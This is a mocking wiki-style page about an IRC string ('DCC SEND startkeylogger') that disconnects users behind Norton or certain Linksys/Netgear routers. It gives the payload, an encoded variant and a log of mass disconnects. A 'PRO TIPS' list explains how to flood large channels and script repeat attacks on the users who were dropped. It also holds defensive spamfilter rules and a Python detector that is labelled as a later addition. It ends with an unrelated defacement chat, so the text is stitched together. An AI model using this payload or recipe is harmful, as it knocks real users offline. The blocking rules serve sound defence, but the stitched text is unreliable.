The phrase '''\x01DCC SEND startkeylogger 0 0 0''' (that's a \x01 character in front) is frequently used by [[h4x0r]]s on [[IRC]] to make Norton and some buggy Linksys / Netgear routers [[Scat|shit on the connection]]. It has highly [[E-drama|dramatic effects]], causing pricks who use Norton or shitty Linksys/Netgear routers to drop off the face of the [[internets]], often flooding the channel with spam. It only needs to be \x01DCC SEND (14+ chars). See: [http://www.hm2k.com/articles/startkeylogger/ startkeylogger]

==Example==

This is what it looks like when a [[H4x0r]] unleashes his vagina powers upon the IRC channel:

<pre>
[15:07:44] <Fail-chan> DCC SEND "startkeylogger" 0 0 0
[15:07:44] * oneszero has quit (Read error: Connection reset by peer)
[15:07:44] * billspork has quit (Read error: Connection reset by peer)
[15:07:44] * cynistyr- has quit (Read error: Connection reset by peer)
[15:07:44] * AudioVENT has quit (Read error: Connection reset by peer)
[15:07:44] * mikel has quit (Read error: Connection reset by peer)
[15:07:44] * Crispy` has quit (Read error: Connection reset by peer)
[15:07:44] * ste_ has quit (Read error: Connection reset by peer)
[15:07:44] * tzennator has quit (Read error 54: Connection reset by peer)
[15:07:44] * Short has quit (Read error: Connection reset by peer)
[15:07:44] * RedXIII has quit (Read error: Connection reset by peer)
[15:07:44] * Urkav has quit (Read error: Connection reset by peer)
[15:07:44] * mflynn00 has quit (Read error: Connection reset by peer)
[15:07:44] * SicdoggV has quit (Read error: Connection reset by peer)
[15:07:45] * HyPn0m0D has quit (Read error: Connection reset by peer)
[15:07:45] * lonequid has quit (Read error: Connection reset by peer)
[15:07:45] * MytSouriS has quit (Read error: Connection reset by peer)
[15:07:45] * Furious_G has quit (Read error: Connection reset by peer)
[15:07:45] * ChunkeyMo has quit (Read error: Connection reset by peer)
[15:07:45] * Antizac has quit (Read error: Operation timed out)
</pre>

Another example is [http://paste.ubuntu.com/787337/ here]. Wonder why this bug still exists in 2011, eh?

You can also encode things between the "s to affect more people. Posted below, but not shown correctly due to wiki fail.

<pre>??�DCC SEND "ff???f?ð‘¹ð‘°ð‘·ð‘³ð‘¶ð‘³ð‘ºð‘¼ð‘·ð‘®ð‘¼ð’€ð‘º" 0 0 0</pre>

==Stopping this shit==

To make the exploit less effective on your IRC experience, buy a new router or connect to the IRC server using SSL.
The latter also prevents [[FBI|eavesdropping]] on your connection.

==PRO TIPS==

To maximize the drama, follow these steps:

#Connect to an IRC Network
#/list all Channels with more than 50 members and join all of them
#/amsg �DCC SEND startkeylogger 0 0 0 or any other command that causes your client to send a message to all channels
#You will probably get kicked from most chans. Write down the nicks of those who got pwnt.
#Convert these names into a script that sends each of them message, containing the evil words
#Give them some time to reconnect, then execute your script
#Execute previous step until you get banned from the network.
#???
#PROFIT

Alternatively you can make this your wireless network id to annoy people within your general vicinity.

==[[Lulzkiller|Filtering this from your network]]==

I've thrown together some quick and dirty UnrealIRCd spamfilter commands to help deal with these exploits. Refinements and improvements welcome!

<pre>
/spamfilter + cpnNPqat block - norton_firewall_exploit startkeylogger
/spamfilter + cpnNPqat block - norton_firewall_exploit stopkeylogger
/spamfilter + cpNPqat block - linksys_netgear_exploit ^DCC SEND ..............
</pre>
(The last one has 14 dots at the end of the pattern.)

If you want to add these to your config file, use

<pre>
# Any text that starts with "DCC SEND " followed by at least 14 more characters
spamfilter {
	regex "^DCC SEND ..............";
	target { channel; private; private-notice; part; quit; away; topic; };
	action block;
	reason "linksys netgear exploit";
};

# Any text that contains "startkeylogger"
spamfilter {
	regex "startkeylogger";
	target { channel; private; private-notice; part; quit; away; topic; private-notice; };
	action block;
	reason "norton firewall exploit";
};
</pre>

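The same checks applied outside the IRCd, for example in a bot or bouncer that cannot rely on the server's spamfilter. This is an added example, not part of the original page or of UnrealIRCd; the rule names mirror the spamfilter reasons above, while the optional leading \x01, the function names and the sample lines are assumptions made for illustration.

```python
import re

# Same patterns as the spamfilter rules above. The optional leading \x01
# is an assumption added here so CTCP-framed and plain-text forms both match.
RULES = [
    ("linksys_netgear_exploit", re.compile(r"^\x01?DCC SEND .{14}")),
    ("norton_firewall_exploit", re.compile(r"startkeylogger|stopkeylogger")),
]

# Commands whose free text the config's target list covers:
# channel/private messages and notices, part, quit, away, topic.
TEXT_COMMANDS = {"PRIVMSG", "NOTICE", "PART", "QUIT", "AWAY", "TOPIC"}


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, command, params, trailing text)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command = parts[0].upper() if parts else ""
    return prefix, command, parts[1:], trailing if sep else ""


def check_line(line):
    """Return the names of the rules a raw IRC line would trip, in rule order."""
    _, command, _, text = parse_irc_line(line)
    if command not in TEXT_COMMANDS:
        return []
    return [name for name, rx in RULES if rx.search(text)]


# Constructed sample traffic (not taken from a real network).
SAMPLE = [
    ":a!u@h PRIVMSG #chan :\x01DCC SEND startkeylogger 0 0 0",
    ":b!u@h PRIVMSG #chan :DCC SEND \"startkeylogger\" 0 0 0",
    ":c!u@h QUIT :stopkeylogger",
    ":d!u@h PRIVMSG #chan :anyone using DCC SEND here?",
    ":e!u@h PRIVMSG #chan :DCC SEND short",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for raw in SAMPLE:
        print(check_line(raw) or "ok", repr(raw))
```
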
==External Links==

*[http://www.hm2k.com/articles/startkeylogger "explains it better"]

{{Trolls}}
{{ircseries}}

[[Category:Drama-generating techniques]]

brutally defaced your page
- master hacker
05:20:22 <~zee> Scootaloo: if I find a website
05:20:24 <~zee> that belongs to you
05:20:26 <~zee> can I deface it?
05:20:33 <~Scootaloo> zee: ok
05:20:33 <~LOLBOAT> lol
05:20:34 <~Scootaloo> u can deface
05:20:37 <~Scootaloo> encyclopediadramatica.se